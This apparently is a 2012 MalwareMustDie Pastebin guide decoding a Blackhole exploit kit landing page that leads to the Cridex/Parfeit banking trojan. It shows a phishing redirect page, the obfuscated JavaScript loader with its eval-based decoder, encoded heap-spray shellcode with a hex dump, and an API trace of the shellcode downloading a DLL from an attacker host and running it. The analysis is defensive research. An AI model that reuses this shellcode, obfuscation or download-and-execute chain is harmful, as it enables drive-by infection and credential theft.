SHARE
TWEET

#malwareMustDie - BHEK decodeGUIDE (payload: Cridex/Parfeit)

MalwareMustDie Dec 22nd, 2012 113 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. # MalwareMustDie - PluginDetect Decoding Guide
  2. # for the Trojan parfeit Investigation
  3. # (Credential Stealer Case)
  4. ------------
  5.  
  6. --18:06:57--  h00p://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.htm
  7.            => `cpa_inform.htm'
  8. Resolving www.irwra.com... 50.116.98.44
  9. Connecting to www.irwra.com|50.116.98.44|:80... connected.
  10. HTTP request sent, awaiting response... HTTP/1.1 200 OK
  11.  
  12. // real time with Xurl..
  13.  
  14. @unixfreaxjp /malware]$ Xurl h00p://www.irwra.com/wp-content/themes/mantra/uploads/cpa_inform.html |jless
  15.  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
  16.                                 Dload  Upload   Total   Spent    Left  Speed
  17. 100   813  100   813    0     0   1187      0 --:--:-- --:--:-- --:--:--  4567
  18. <html>
  19. <head>
  20. <title>Processing request... Banking, Credit Cards, Lending & Investing - CPA</title>
  21.  
  22. <script type="text/javascript">
  23. <!--
  24. location.replace("h00p://latticesoft.net/detects/continues-little.php");
  25. //-->
  26. </script>
  27. <noscript>
  28. <meta http-equiv="refresh" content="0; url=h00p://latticesoft.net/detects/continues-little.php">
  29. </noscript>
  30.  
  31. </head>
  32.  
  33. <h1>You will be redirected to details of purchase</h1>
  34.  
  35.  
  36. <h4 style="color:#364dbc;">We must complete few security checks to show your transfer details:</h4>
  37.  
  38. <h3>Be sure you have a transfer reference ID.<br />You will be asked to enter it after we check the link.<br><br>Important: Please be advised that calls to and from your wire service team may be monitored or recorded.<br /></h3>
  39.  
  40. <h3>Redirecting to Survey details... Please wait...</h3>
  41.  
  42.  
  43.  
  44. </html>
  45.  
  46. ------------------------------------------------
  47.  
  48. --2012-12-22 03:44:27--  h00p://latticesoft.net/detects/continues-little.php
  49. Resolving latticesoft.net (latticesoft.net)... 59.57.247.185
  50. Caching latticesoft.net => 59.57.247.185
  51. Connecting to latticesoft.net (latticesoft.net)|59.57.247.185|:80... connected.
  52.  
  53. ---request begin---
  54. GET /detects/continues-little.php HTTP/1.1
  55. Referer: http://www.irwra.com//wp-content/themes/mantra/uploads/cpa_inform.html
  56. User-Agent: #MalwareMustDie!
  57. Accept: */*
  58. Host: latticesoft.net
  59. Connection: Keep-Alive
  60. HTTP request sent, awaiting response...
  61.  
  62. ---response begin---
  63. HTTP/1.1 200 OK
  64. Server: nginx/1.3.3
  65. Date: Fri, 21 Dec 2012 18:44:29 GMT
  66. Content-Type: text/html
  67. Transfer-Encoding: chunked
  68. Connection: close
  69. X-Powered-By: PHP/5.3.14
  70. 200 OK
  71. Length: unspecified [text/html]
  72. Saving to: `continues-little.php'
  73. 2012-12-22 03:44:33 (28.7 KB/s) - `continues-little.php' saved [95903]
  74.  
  75. --------------------------------------------------------
  76.  
  77. TRY TWO:
  78.  
  79. --14:18:07--  h00p://latticesoft.net/detects/continues-little.php
  80.           => `continues-little.php.1'
  81. Resolving latticesoft.net... seconds 0.00, 59.57.247.185
  82. Caching latticesoft.net => 59.57.247.185
  83. Connecting to latticesoft.net|59.57.247.185|:80... seconds 0.00, connected.
  84. Created socket 1896.
  85. Releasing 0x003d5348 (new refcount 1).
  86. ---request begin---
  87. GET /detects/continues-little.php HTTP/1.0
  88. Referer: h00p://www.irwra.com//wp-content/themes/mantra/uploads/cpa_inform.html
  89. User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6)
  90. Accept: */*
  91. Host: latticesoft.net
  92. Connection: Keep-Alive
  93.  
  94. ---request end---
  95. HTTP request sent, awaiting response...
  96. ---response begin---
  97. HTTP/1.1 200 OK
  98. Server: nginx/1.3.3
  99. Date: Sat, 22 Dec 2012 05:17:56 GMT
  100. Content-Type: text/html
  101. Connection: close
  102. X-Powered-By: PHP/5.3.14
  103.  
  104. ---response end---
  105. 200 OK
  106. Length: unspecified [text/html]
  107. 14:18:13 (25.29 KB/s) - `continues-little.php.1' saved [91337]  <=============== the size changes....
  108.  
  109.  
  110. ---------------
  111. // CHANGES!!!!!! WHy? What?
  112. // what had changed??
  113. // let's use unix's diff command to diff the previous code w/new one and see what's changes the moronz did:
  114.  
  115. 0x001c1
  116.  
  117. < <html><head><title></title></head><body>
  118. <applet archive="/detects/continues-little.php?zasyymcc=vwg&ncnjr=qjx" code="&#00104;&#00119;">
  119. <param value="Dyy3Ojj-Vyy8%eit.ywoeyjMeye%yi" name="&#00118;&#0097;&#00108;"/>
  120. <param value="j%toy8oKeim-8yy-ew3D3xe.b1fO6oO68O68O11R8eb6oOh_O68O6CO6tO68O6AOhvO60O60RMb6.RC3bvRl?bS" name="&#00112;&#00114;&#00105;&#00109;&#00101;" />
  121. </applet><div></div><script>dd="i";pp="e"+"In";asd=function(){for(i=0;;i++){
  122.  
  123.  
  124. 0x007c7
  125.  
  126. < <script>a.setAttribute("z5","-2f666eb-46996eb-671g4fc-6bkg4
  127. 2e5907a-8h8h8dg-671dmf3-3e5dgf9-1g7ff66-4698heh-3e866e8-871eh
  128. 6696969-0h88hfl-4e5g4g7-7flf955-5djh8h8-56iebe5-3g4c6e5-4flg1
  129. 3f98heh-1e866e8-171ebe5-6g4c6e5-9flg1eh-3fcf99l-0fcf9e5-15890
  130. 271g1ff-1f3ehg4-0b5g7f6-7bhe5eb-9gg6idg-671ebe5-2g4c6e5-1flg1
  131. 7e56669-2h8h86i-2dge2e2-6c9ehf9-6a1gae5-2f9g48e-9e8g7f9-9dmg4
  132. 7g4dgdm-2eea1ga-0e5f9g4-2665bfc-3f95b6f-8e26idm-269h8e5-4f3g1
  133. 8e8g7f9-7dmg177-68ecld4-96ic9am-2e8g7f9-8dmg18e-8cld46i-3flg7
  134. -8e5f9g4-26idg90-6e271eb-7e5g4a1-3f3e5f6-1e5f9g4-0g19fgj-9c0d
  135. -5e5f9g4-1g19fgj-9c0dgeb-8b5dgf6-3e5665b-0djfce2-2gj5b69-6cl7
  136. -16iff6i-0fc90f6-171dmfl-1e5dgg4-1e5a1f3-4e5f6e5-6f9g466-85bg
  137. -7f9e56l-2g1g4gj-7f3e58e-6f9fcf9-5e58hdj-5fcfle2-5e5fl6l-8g1g
  138. -8dgg1e5-4666971-0fle5ff-7f3dgdm-0e56674-6d1g174-4eb6i5b-45b6
  139.  
  140. 0x018c18
  141.  
  142. <       if(a["su"+"bstr"](i,1)=="-")i+=2;
  143. ---
  144. >       if(a["substr"](i,1)=="-")i+=2;
  145.  
  146. // yep, the moronz was changing the jar applet infector (0x001c1) &
  147. // it changed the obfuscation code (0x007c7) and also -
  148. // making more scattered strings for the obfs generator code (0x018c18)
  149.  
  150. // These three changes suggested the payload has changed.
  151. // Nevermind with the old payload so we get into the new one!
  152.  
  153. --------------------------------------------------------
  154.  
  155. // See the latest code...
  156.  
  157. // let's strip the garbage html code & make it more viewable..
  158. // then see which are th epart of obfuscation & its sturcture,
  159. // and recognize where's obfuscated data feed code & decoding generator code.
  160.  
  161. // After that go to the obfuscation part and undersatnding the structure < important!
  162. // In this case those malware moronz is splitting obfuscation code within a.setAttribute()
  163. // arrays using scripts tags, just adjust them by deleting all <script></script>
  164. // tags and you're good to go.
  165.  
  166. // So, the structure of the current obfuscated structure is:
  167.  
  168. a.setAttribute("z0","-[0-9|a-z]...-[0-9|a-z]");
  169.                z0+1
  170.                :
  171.                z29
  172.  
  173. // And this is the code to feed obfuscated data...
  174.  
  175. dd="i";
  176. pp="e"+"In";
  177.  
  178. asd=function()
  179.   {
  180.   for(i=0;;i++)
  181.       {
  182.       r=a.getAttribute("z"+i);if(r){s=s+r;}else break;
  183.       }};
  184. a=document.createElement(dd);
  185.  
  186.  
  187. // Thus, this is the generator part to crack the code;
  188.  
  189. document.body.appendChild(a);
  190. if(document.getElementsByTagName("d"+"iv")[0].style.left==="")
  191. {
  192.   ss=String.fromCharCode;
  193.   a=document["getElementsB"+"yTagName"](dd);
  194.   a=a[0];
  195.   s=new String();
  196.   asd();
  197.   a=s;
  198.   s=new String();
  199.   e=window["eva"+"l"];
  200.   p=parseInt;
  201.   for(i=0;a.length>i;i+=2)
  202.   {
  203.     if(a["su"+"bstr"](i,1)=="-")i+=2;
  204.     s=s+(ss((p(a["substr"](i,2),23)-24)/3));
  205.   }
  206.   try
  207.   {
  208.     document.body*=document;
  209.   }
  210.   catch(asfas)
  211.   {
  212.     e("if(1)"+s);
  213.   }
  214. }
  215.  
  216.  
  217. // And this is the logic formula to crack :
  218.  
  219.   // here's the formula...
  220.   for(i=0;a.length>i;i+=2)
  221.   {
  222.     if(a["substr"](i,1)=="-")i+=2;
  223.     s=s+(ss((p(a["substr"](i,2),23)-24)/3));
  224.   }
  225.  
  226.  
  227. // You can manipulate the decoding operation easlizy by making
  228. // array of a element and feed the array 0 to 29 with
  229. // the garbled code one by one and just feed it into the
  230. // formula.
  231.  
  232.  
  233. //And the result is the NEW PLUGINDETECT OBFS code (v 0.7.9)
  234.  
  235. var PluginDetect =
  236. {
  237.   version : "0.7.9", name : "PluginDetect", handler : function (c, b, a)
  238.   {
  239.     return function ()
  240.     {
  241.       c(b, a)
  242.     }
  243.   }
  244.   , openTag : "<", isDefined : function (b)
  245.   {
  246.     return typeof b != "undefined"
  247.   }
  248.   , isArray : function (b)
  249.   {
  250.     return (/array/i).test(Object.prototype.toString.call(b))
  251.        :
  252.        :(blah! etc)
  253.  
  254. //let's modify shellcode to grab the payload:
  255.  
  256. var a = "8282!%51c4!%04e4!%25e0!%f551!%e014!%9134!%4451!%54e0!%2191!%9154!%e521!%21a1!%91f4!%1421!%2191!%9174!%2421!%2191!%9114!%f521!%21a1!%9164!%d451!%e0f4!%b181!%2421!%2191!%91e4!%e521!%21a1!%b181!%e451!%7125!%0485!%6085!%44d4!%c5c5!%4414!%b550!%d5d4!%1464!%64c5!%b474!%b570!%b4c5!%c5d4!%c4d4!%c570!%64d4!%c560!%74e4!%d4b5!%14b4!%c5c5!%4494!%7070!%8521!%c5c5!%8504!%2370!%15e1!%eee6!%3733!%2e2a!%59b1!%7492!%621a!%6d2a!%4c0b!%6662!%7d6a!%6d7d!%0c4b!%e702!%6d7d!%8224!%ce24!%82d5!%8a71!%2df6!%82d5!%8a71!%b3f6!%a23c!%423c!%babe!%e7c2!%b77d!%3c42!%82ba!%c224!%7de7!%82b7!%e324!%8ed5!%c3da!%7de7!%2482!%b7f7!%2482!%2482!%9697!%53c2!%0ac6!%c281!%2a9e!%8217!%5312!%eec6!%4444!%60c4!%53d2!%fec6!%a4c5!%f585!%5382!%fec6!%1e97!%0cb1!%423a!%7de7!%8282!%0d82!%b704!%b580!%8050!%c002!%fec6!%b1a1!%e5a5!%c0c2!%fec6!%f4b5!%a5d4!%c2c0!%42fe!%47c0!%825a!%9282!%4cc2!%a59a!%a23c!%7d3c!%7d7d!%0c94!%3a0c!%ce02!%e3ba!%c77d!%4454!%d5a5!%8204!%6482!%0474!%7dbc!%bed2!%83ba!%3a67!%3a4c!%87d7!%8e13!%87ba!%8282!%7d82!%8604!%8724!%8207!%8282!%0c82!%ac1d!%7d7d!%0b7d!%170c!%24d2!%3afd!%0402!%bd3a!%eb3c!%c5b2!%42b1!%8a55!%0480!%583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%0fb2!%423a!%c7c0!%4c7d!%5ae6!%4236!%e43a!%b25f!%67c0!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c502!%01ad!%6983!%3f72!%deb1!%58b2!%964d!%1e16!%ddb1!%80b2!%3ae5!%dde7!%05b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%c0da!%fac1!%d53d!%11e2!%bee6!%8681!%093a!%7d7d!%d383!%9a6c!%b140!%b2c5!%6741!%e43a!%b13f!%e502!%e73a!%8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%508e!%afbe!%042e!%0382!%ef08!%9e80!%6618!%139c!%0185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join("");
  257. var x=a["replace"](/\%!/g, "%" + "u");
  258. document.write(x);
  259.  
  260. ↓↓
  261.  
  262. %u4141%u4141%u8366%ufce4%uebfc%u5810%uc931%u8166%u08e9%u80fe%u2830%ue240%uebfa%ue805%uffeb%uffff%uccad%u1c5d%u77c1%ue81b%ua34c%u1868%u68a3%ua324%u3458%ua37e%u205e%uf31b%ua34e%u1476%u5c2b%u041b%uc6a9%u383d%ud7d7%ua390%u1868%u6eeb%u2e11%ud35d%u1caf%uad0c%u5dcc%uc179%u64c3%u7e79%u5da3%ua314%u1d5c%u2b50%u7edd%u5ea3%u2b08%u1bdd%u61e1%ud469%u2b85%u1bed%u27f3%u3896%uda10%u205c%ue3e9%u2b25%u68f2%ud9c3%u3713%uce5d%ua376%u0c76%uf52b%ua34e%u6324%u6ea5%ud7c4%u0c7c%ua324%u2bf0%ua3f5%ua32c%ued2b%u7683%ueb71%u7bc3%ua385%u0840%u55a8%u1b24%u2b5c%uc3be%ua3db%u2040%udfa3%u2d42%uc071%ud7b0%ud7d7%ud1ca%u28c0%u2828%u7028%u4278%u4068%u28d7%u2828%uab78%u31e8%u7d78%uc4a3%u76a3%uab38%u2deb%ucbd7%u4740%u2846%u4028%u5a5d%u4544%ud77c%uab3e%u20ec%uc0a3%u49c0%ud7d7%uc3d7%uc32a%ua95a%u2cc4%u2829%ua528%u0c74%uef24%u0c2c%u4d5a%u5b4f%u6cef%u2c0c%u5a5e%u1a1b%u6cef%u200c%u0508%u085b%u407b%u28d0%u2828%u7ed7%ua324%u1bc0%u79e1%u6cef%u2835%u585f%u5c4a%u6cef%u2d35%u4c06%u4444%u6cee%u2135%u7128%ue9a2%u182c%u6ca0%u2c35%u7969%u2842%u2842%u7f7b%u2842%u7ed7%uad3c%u5de8%u423e%u7b28%u7ed7%u422c%uab28%u24c3%ud77b%u2c7e%uebab%uc324%uc32a%u6f3b%u17a8%u5d28%u6fd2%u17a8%u5d28%u42ec%u4228%ud7d6%u207e%ub4c0%ud7d6%ua6d7%u2666%ub0c4%ua2d6%ua126%u2947%u1b95%ua2e2%u3373%u6eee%u1e51%u0732%u4058%u5c5c%u1258%u0707%u4944%u5c5c%u4b41%u5b4d%u4e47%u065c%u4d46%u075c%u4d4c%u4d5c%u5c4b%u075b%u474b%u5c46%u4641%u4d5d%u055b%u4144%u5c5c%u4d44%u5806%u5840%u5217%u154e%u181b%u1a12%u125e%u4e19%u1912%u1242%u181b%u4f0e%u154d%u4619%u1a12%u125f%u4119%u1912%u1242%u4719%u1912%u1241%u4f19%u1a12%u125e%u4519%u1912%u0e45%u1544%u4319%u410e%u155f%u0e52%u4e40%u4c15%u2828
  263.  
  264.  
  265. // here's the shellcode (in bin & text)....
  266.  
  267. 41 41 41 41 66 83 e4 fc  fc eb 10 58 31 c9 66 81   AAAAf......X1.f.
  268. e9 08 fe 80 30 28 40 e2  fa eb 05 e8 eb ff ff ff   ....0(@.........
  269. ad cc 5d 1c c1 77 1b e8  4c a3 68 18 a3 68 24 a3   ..]..w..L.h..h$.
  270. 58 34 7e a3 5e 20 1b f3  4e a3 76 14 2b 5c 1b 04   X4~.^...N.v.+\..
  271. a9 c6 3d 38 d7 d7 90 a3  68 18 eb 6e 11 2e 5d d3   ..=8....h..n..].
  272. af 1c 0c ad cc 5d 79 c1  c3 64 79 7e a3 5d 14 a3   .....]y..dy~.]..
  273. 5c 1d 50 2b dd 7e a3 5e  08 2b dd 1b e1 61 69 d4   \.P+.~.^.+...ai.
  274. 85 2b ed 1b f3 27 96 38  10 da 5c 20 e9 e3 25 2b   .+...'.8..\...%+
  275. f2 68 c3 d9 13 37 5d ce  76 a3 76 0c 2b f5 4e a3   .h...7].v.v.+.N.
  276. 24 63 a5 6e c4 d7 7c 0c  24 a3 f0 2b f5 a3 2c a3   $c.n..|.$..+..,.
  277. 2b ed 83 76 71 eb c3 7b  85 a3 40 08 a8 55 24 1b   +..vq..{..@..U$.
  278. 5c 2b be c3 db a3 40 20  a3 df 42 2d 71 c0 b0 d7   \+....@...B-q...
  279. d7 d7 ca d1 c0 28 28 28  28 70 78 42 68 40 d7 28   .....((((pxBh@.(
  280. 28 28 78 ab e8 31 78 7d  a3 c4 a3 76 38 ab eb 2d   ((x..1x}...v8..-
  281. d7 cb 40 47 46 28 28 40  5d 5a 44 45 7c d7 3e ab   ..@GF((@]ZDE|.>.
  282. ec 20 a3 c0 c0 49 d7 d7  d7 c3 2a c3 5a a9 c4 2c   .....I....*.Z..,
  283. 29 28 28 a5 74 0c 24 ef  2c 0c 5a 4d 4f 5b ef 6c   )((.t.$.,.ZMO[.l
  284. 0c 2c 5e 5a 1b 1a ef 6c  0c 20 08 05 5b 08 7b 40   .,^Z...l....[.{@
  285. d0 28 28 28 d7 7e 24 a3  c0 1b e1 79 ef 6c 35 28   .(((.~$....y.l5(
  286. 5f 58 4a 5c ef 6c 35 2d  06 4c 44 44 ee 6c 35 21   _XJ\.l5-.LDD.l5!
  287. 28 71 a2 e9 2c 18 a0 6c  35 2c 69 79 42 28 42 28   (q..,..l5,iyB(B(
  288. 7b 7f 42 28 d7 7e 3c ad  e8 5d 3e 42 28 7b d7 7e   {.B(.~<..]>B({.~
  289. 2c 42 28 ab c3 24 7b d7  7e 2c ab eb 24 c3 2a c3   ,B(..${.~,..$.*.
  290. 3b 6f a8 17 28 5d d2 6f  a8 17 28 5d ec 42 28 42   ;o..(].o..(].B(B
  291. d6 d7 7e 20 c0 b4 d6 d7  d7 a6 66 26 c4 b0 d6 a2   ..~.......f&....
  292. 26 a1 47 29 95 1b e2 a2  73 33 ee 6e 51 1e 32 07   &.G)....s3.nQ.2.
  293. 58 40 5c 5c 58 12 07 07  44 49 5c 5c 41 4b 4d 5b   X@\\X...DI\\AKM[
  294. 47 4e 5c 06 46 4d 5c 07  4c 4d 5c 4d 4b 5c 5b 07   GN\.FM\.LM\MK\[.
  295. 4b 47 46 5c 41 46 5d 4d  5b 05 44 41 5c 5c 44 4d   KGF\AF]M[.DA\\DM
  296. 06 58 40 58 17 52 4e 15  1b 18 12 1a 5e 12 19 4e   .X@X.RN.....^..N
  297. 12 19 42 12 1b 18 0e 4f  4d 15 19 46 12 1a 5f 12   ..B....OM..F.._.
  298. 19 41 12 19 42 12 19 47  12 19 41 12 19 4f 12 1a   .A..B..G..A..O..
  299. 5e 12 19 45 12 19 45 0e  44 15 19 43 0e 41 5f 15   ^..E..E.D..C.A_.
  300. 52 0e 40 4e 15 4c 28 28                            R.@N.L((        
  301.  
  302. // And the translation of the API.....
  303.  
  304. 0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
  305. 0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
  306. 0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
  307. 0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=http://latticesoft.net/detects/continues-little.php?zf=30:2v:1f:1j:30&ge=1n:2w:1i:1j:1o:1i:1g:2v:1m:1m&l=1k&iw=z&hf=d , lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
  308. 0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
  309. 0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)       
  310. 0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
  311.  
  312. ----
  313. #MalwareMustDie!
  314. unixfreaxjp /malware]$ date
  315. Sat Dec 22 18:59:02 JST 2012
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top